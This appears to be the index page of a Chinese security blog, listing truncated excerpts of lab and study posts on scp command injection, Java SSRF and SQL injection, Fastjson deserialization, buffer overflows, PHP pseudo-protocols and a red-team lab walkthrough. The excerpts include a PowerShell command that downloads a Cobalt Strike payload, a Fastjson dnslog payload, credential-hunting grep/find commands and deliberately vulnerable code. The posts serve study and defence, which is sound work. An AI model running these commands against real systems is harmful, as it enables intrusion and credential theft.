Zeo's Blog

0x01 漏洞简介SCP(secure copy)是linux系统下基于ssh登录进行安全远程文件拷贝的命令，可以在linux之间复制文件和目录。 OpenSSH中小于 8.3p1版本 SCP命令里存在命令注入漏洞。当将文件复制到远程服务器时，文件路径附加在本地scp命令的末尾，可以触发命令注入漏洞。 漏洞存在的点在 https://github.com/openssh/openssh-portable/blob/a2855c048b3f4b17d8787bd3f24232ec0cd79abe/scp.c#L989 攻击者可以采用反引号(`)文件作为命令注入执行scp命令，命令将会发送到远程服务器并执行。 作者介绍是 将文件复制到远程服务器时，文件路径会附加在本地scp命令的末尾。例如，如果执行以下命令 1scp SourceFile user@host:directory/TargetFile 它将执行本地命令 1scp -t directory/TargetFile 大佬的原帖https://github.com/cpandya2909/CVE-2020-15778/ 0x ...

0x00 前提主要是因为自己的学习Java 代码审计中的学习思路吧，主要自己一个人学习，有点闭门造车，百度学习法，但是还是记录一下，也分享一下，也便于将来的总结和反思，如果我能终能学到什么，我也会重新梳理思路，为那些自学者提供一个好的思路，所以有了下面的系列文章java代码审计自学篇。 这个是因为刚刚造轮子，学习了一下Java的GUI是怎么写的，造了一个轮子，要写一个爬虫，由于中间出现了小bug，看了看网络请求这块，后来发现顺便就是把SSRF这个漏洞就一起研究。 0x01 SSRF漏洞SSRF(Server-Side Request Forge, 服务端请求伪造)，攻击者让服务端发起指定的请求，SSRF攻击的目标一般是从外网无法访问的内网系统。 这个不必多说了，直接copy吧 Java中的SSRF和PHP的有点区别：协议支持少一些，而且部分协议是受限的比如gopher协议，所以总体上来说Java的SSRF危害肯没PHP那么大。 通常 ssrf 容易出现的功能点，还是和php那些都一样： 基本上都是发起url请求的地方： 1、通过关键字 share、url、link、src、sour ...

0x00 简介主要是因为自己的学习Java 代码审计中的学习思路吧，主要自己一个人学习，有点闭门造车，百度学习法，但是还是记录一下，也分享一下，也便于将来的总结和反思，如果我能终能学到什么，我也会重新梳理思路，为那些自学者提供一个好的思路，所以有了下面的系列文章java代码审计自学篇。 P牛的文章中说到： Java安全可以从反序列化漏洞开始说起，反序列化漏洞⼜可以从反射开始说起。 0x01 Java反射机制我之前觉得Java学起来感觉是比较死的，因为我只是站在变成的角度，php的各种动态的调用，免杀起来都方便的不行，但是发现java的提供的“反射”功能，也是可以提供⼀些动态特性，也是灵活的 所以，Java反射(Reflection)是Java非常重要的动态特性 我们通过使用反射我们不仅可以获取到任何类的成员方法(Methods)、成员变量(Fields)、构造方法(Constructors)等信息 还可以动态创建Java类实例、调用任意的类方法、修改任意的类成员变量值等。 简单的说就是，我们用对象可以通过反射获取他的类，用类可以通过拿到它的所有⽅法（包括私有），拿到的⽅法可以为所欲 ...

0x00 前提主要是因为自己的学习Java 代码审计中的学习思路吧，主要自己一个人学习，有点闭门造车，百度学习法，但是还是记录一下，也分享一下，也便于将来的总结和反思，如果我能终能学到什么，我也会重新梳理思路，为那些自学者提供一个好的思路，所以有了下面的系列文章java代码审计自学篇。 0x01 漏洞原理虽然基础，但是还是介绍一下吧 SQL 注入老生常谈，就是 SQL 命令插入请求中，并在服务器端被接收后用，没有有效的过滤，导致服务器执行了意料之外的恶意的 SQL 命令，最终达到恶意的脱数据。 Java 的 SQL 注入和 PHP 中的 SQL 注入，其实原理都是一样的，理论上只要是与数据库存在数据交互，只要传入的数据完全受用户控制，没有有效的过滤都有可能出现 SQL 注入的。 java的特殊是有一些框架会托管一部分的数据库的操作，我们要了解一下 0x02 分类：拼接和预编译1、直接拼接，未进行过滤将request.getParameter("id")获取的id直接放在SQL语句，没有过滤而且是拼接的情况 以前的JDBC的方式，的直接拼接方式，存在sql注入： ...

0x00 简介本次主要记录缓冲器溢出的：原理、实现和shellcode的编写 详细的去理解原理，和底层开始写shellcode 本次实验的C代码 123456789101112131415161718192021222324252627282930313233#include <stdio.h>#include <windows.h>#define PASSWORD "1234567"int verify_password (char *password){ int authenticated; char buffer[44]; authenticated=strcmp(password,PASSWORD); strcpy(buffer,password);//over flowed here! return authenticated;} main(){ int valid_flag=0; char password[1024]; FILE * fp; LoadLibrary("user32.d ...

0x01漏洞介绍Fastjson是阿里巴巴公司开源的一款json解析器，其性能优越，被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单，而在1.2.48以前的版本中，攻击者可以利用特殊构造的json字符串绕过白名单检测，成功执行任意命令。 0x02影响范围Fastjson < 1.2.68 Fastjson爆出的绕过方法可以通杀1.2.68版本以下所有 0x03漏洞复现下面以Fastjson 1.2.47 为例子，因为vulhub有现成的环境十分方便 12P牛我用vulhub中的 1.2.47的docker 想测试doslog检查 fastjson 但是总是收到不到dnslog 但是正常的exp反弹shell就是可以我很疑惑 我的用法正确吗，用的这个{"@type":"java.net.Inet4Address","val":"bouaiq.dnslog.cn"} 下面是流程示意图 主机A：存在fastjson反序列化漏 ...

前言这是老以前做的一个，主要熟悉一下cs4的新特性，还是发出来看看吧，流程简单一些，但是内网流程还是比较完整的。大家可以看看 本次靶机为红日安全的ATT&CK第五个靶场。 http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 思路参考 记一次在Vulnstack ATT&CK 5 靶场中使用CobaltStrike的渗透之旅 文章中如有错误的地方望大佬指正。 菜鸡文章望大佬勿喷。 0x00信息收集Namp 扫一下 发现 80 3306 访问一下发现thinkphp5 记得是有rce的 searchsploit thinkphp 有货 0x00入口权限获取 cool可以用 上传的姿势太多了，我就使用一个最简单的 使用powershell 下载 CS payload 12345powershell (new-object Net.WebClient).DownloadFile('http://192.168.203.140/a.ps1','C:\phpstudy_pro\WWW\a.p ...

进制的定义二进制：由两个符号组成，分别是0 、1 八进制：由八个符号组成，分别是0、1、2、3、4、5、6、7 十进制：由十个符号组成，分别是0、1、2、3、4、5、6、7、8、9 十六进制：由十六个符号组成，分别是0、1、2、3、4、5、6、7、8、9、A、B、C、D、E、F 度量单位:1byte 字节 = 8 bit 比特 char WORD = 2 BYTE = 16 bit short int DWORD = 4 BYTE = 32 bit QWORD = 8 BYTE = 64 bit 1kb = 1024 byte = 8192 bit 1mb = 1024 kb 1gb = 1024 mb 1tb = 1024 gb 有符号 无符号 byte -128-127 0-255 word -32768-32767 0-65535 DWORD qword 16位汇编：实模式，16位处理器内的内部，最多可以处理存储的长度为 ...

Linux 内网本机信息收集速查 系统类型12cat /etc/issue查看系统名称 网络信息收集123456last 多数运维会接入内网登录系统，这时候，便可获取部分内网ip 进而对内网IP段进行画像Route -n 内网路由情况，也能为内网网络拓扑提供一定的信息IPtables 防火墙情况，有时候会存在内网网络通行规则，也能提供一定信息历史命令！/root/.bash_history 直接命令搜敏感文件收集1234grep "password:" * -Rnfind / -name "config.*"find / -name "databases.*"find / -name "config.*" | xargs grep "password"" 常用敏感文件12345 ...

0x00 起因被问到了php的一伪协议 后发现自己对伪协议的认识还是太浅， 现在好好总结学习一番 又感觉自己学了半天不知道自己在干嘛。。。哎。。。 0x01 环境PHP版本：5.4.45 PHP.ini： allow_url_fopen ：on 默认开启 allow_url_include：om 默认关闭 PHP版本<=5.2 可以使用%00进行截断，但是少有低版本的了。。。 先站在前人的大肩膀看看总结 ，主要是两个选项的开关，实验我默认都开了 freebuff上看到的 0x02 具体的协议我的实验代码cmd.php 123<?phpinclude($_GET['file'])?> php:// 访问输入输出流其中主要有两个协议： php://filter 简介PHP 过滤器用于对来自非安全来源的数据（比如用户输入）进行验证和过滤。 在文件包含中常用到这个协议（因为文件包含的特性，只有包含php标签就会解析，就算是PHP后缀但是里面没有PHP标签也不会解析） 所以如果想要读取运行php文件的 ...